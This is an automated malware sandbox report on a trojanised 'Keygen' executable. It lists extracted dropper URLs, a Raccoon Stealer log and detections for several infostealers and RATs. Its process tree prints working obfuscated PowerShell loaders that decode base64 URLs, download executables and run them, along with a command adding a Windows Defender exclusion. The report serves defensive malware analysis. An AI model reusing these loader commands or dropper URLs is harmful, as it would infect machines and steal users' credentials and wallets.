Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (121) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:20:29 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (756 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (121) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (121) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:408
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E9E8.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (121) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3740
      • C:\Users\Admin\AppData\Local\Temp\E9E8.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4024
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E9E8.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2016
          • C:\Users\Public\vce.exe
            "C:\Users\Public\vce.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3936
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4420
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4272
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4272 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\457141264378696\\* & exit
                  8⤵
                    PID:2768
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4272
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4292
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4428
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4596
              • C:\Users\Public\vce.exe
                "C:\Users\Public\vce.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4548
                • C:\Users\Admin\AppData\Local\Temp\ioLpOUVC9E.exe
                  "C:\Users\Admin\AppData\Local\Temp\ioLpOUVC9E.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4916
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\ioLpOUVC9E.exe"'
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3188
                • C:\Users\Admin\AppData\Local\Temp\wXytq8rrCs.exe
                  "C:\Users\Admin\AppData\Local\Temp\wXytq8rrCs.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4296
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:4804
                  • C:\Users\Admin\AppData\Local\Temp\92FbxmoLGm.exe
                    "C:\Users\Admin\AppData\Local\Temp\92FbxmoLGm.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:4720
                  • C:\Users\Admin\AppData\Local\Temp\zj27YX9aY5.exe
                    "C:\Users\Admin\AppData\Local\Temp\zj27YX9aY5.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2188
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:8
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\vce.exe"
                    7⤵
                      PID:4876
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:3556
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E9E8.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2992
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3656
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:776
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E9E8.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3096
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
